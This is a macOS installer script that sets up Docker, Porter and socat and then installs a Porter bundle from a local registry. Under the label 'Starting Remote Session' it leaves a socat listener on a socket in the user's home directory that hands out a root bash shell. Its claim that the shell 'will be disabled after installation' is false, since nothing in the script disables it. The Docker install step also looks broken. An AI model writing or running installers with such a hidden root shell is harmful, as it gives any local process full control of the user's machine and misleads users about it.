#!/usr/bin/env /usr/bin/sudo bash
function installDocker() {
    echo "Installing Docker"
    hdiutil attach Docker.dmg
    mv /Volumes/Docker/Docker.app /Volumes/Docker/Applications/Docker.app
}

installdir=$(pwd)
echo "Checking for docker installation"
docker --version >/dev/null 2>&1
if [ $? == 1 ]; then
    installDocker
else
    dockerversion="$(docker --version | awk '{print $3}' | awk -F '.' '{print $1"."$2}')"
    if [ "$dockerversion" != "20.10" ]; then
        echo "Docker is out of date"
        installDocker
    else
        echo "Up-to-date Docker installation detected. Skipping Docker install"
    fi
fi

echo "Installing Porter"
cd "$HOME" && tar -zxvf "$installdir/porter.tar.gz" && cd "$installdir" || exit 1

echo "Installing Socat Utility"
installer -pkg socat-1.7.4.3.pkg -target /

echo "Starting Remote Session"
echo "This will be disabled after installation"
mkdir -p "$HOME/exec"
screen -S install -dm socat UNIX-LISTEN:"$HOME/exec/exec.sock",fork EXEC:/bin/bash,pty,ctty,su=root

porter install localhost:5015/porter_test
